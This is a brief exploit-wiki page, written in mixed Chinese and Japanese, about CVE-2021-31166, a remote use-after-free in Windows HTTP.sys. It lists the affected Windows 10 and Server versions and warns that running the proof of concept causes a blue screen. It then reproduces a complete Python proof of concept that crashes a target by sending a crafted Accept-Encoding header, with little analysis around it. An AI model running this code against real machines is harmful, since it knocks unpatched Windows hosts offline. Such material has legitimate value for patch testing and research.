# CVE-2021-31166 HTTP協議棧遠程代碼執行漏洞/ja
==脆弱性への影響==
Windows Server, version 20H2 (Server Core Installation) Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 for 32-bit Systems Windows 10 Version 20H2 for x64-based Systems Windows Server, version 2004 (Server Core installation) Windows 10 Version 2004 for x64-based Systems Windows 10 Version 2004 for ARM64-based Systems Windows 10 Version 2004 for 32-bit Systems
==POC==
⚠️️POCを実行するとブルースクリーンが表示されます。
# Axel '0vercl0k' Souchet - May 16 2021 import requests import argparse def main(): parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys') parser.add_argument('--target', required = True) args = parser.parse_args() r = requests.get(f'http://{args.target}/', headers = { 'Accept-Encoding': 'doar-e, ftw, imo, ,', }) print(r) main()
==GIF==
![](/static/pwnwiki/img/windows.gif )
==参照==
https://github.com/0vercl0k/CVE-2021-31166
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容